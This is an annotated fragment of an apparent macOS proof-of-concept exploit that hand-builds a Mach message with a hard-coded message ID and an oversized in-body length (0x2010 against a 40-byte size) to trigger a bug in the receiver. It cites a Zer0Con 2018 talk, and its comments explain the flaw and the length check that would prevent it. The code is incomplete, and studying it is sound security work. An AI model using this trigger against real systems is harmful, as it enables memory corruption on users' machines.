// Fragment of a proof-of-concept that fills in a Mach message header and body
// by hand. msg_t and getport are defined outside this excerpt, and the call
// that actually sends the message is not shown.
//
// r holds two window IDs, zero-initialised here. The elided code below
// presumably fills it in before r[0] is read -- TODO confirm.
CGWindowID r[2] = {0};
//...
// Not used in the visible lines; presumably receives the send result later.
mach_msg_return_t ret;
msg_t message;

// Reply port for the calling thread; becomes the message's local port below.
mach_port_t replyPort = mig_get_reply_port();

//go trigger the bug!
// Zero the whole struct first so every field not assigned below is 0.
memset(&message, 0, sizeof(message));
message.header.msgh_remote_port = getport;
message.header.msgh_local_port = replyPort;
// Remote port: copy of an existing send right. Local port: a send-once right
// created for the reply.
message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
// Hard-coded rather than derived from sizeof(message).
// NOTE(review): presumably matches the layout of msg_t -- confirm.
message.header.msgh_size = 40;
// 0x7210 + 0xc8 == 0x72d8. Presumably a subsystem base plus a routine
// offset -- confirm against the reference.
message.header.msgh_id = 0x7210 + 0xc8;

message.NDR = NDR_record;
message.wid = r[0];
// NOTE(review): 0x2010 (8208) is far larger than the 40-byte msgh_size set
// above. That mismatch is presumably the point of the PoC: the receiver
// appears to trust this in-body length. A message handler should check such
// a field against the received message size and its own buffer bounds
// before using it.
message.length = 0x2010;




Reference: zer0con2018_singi
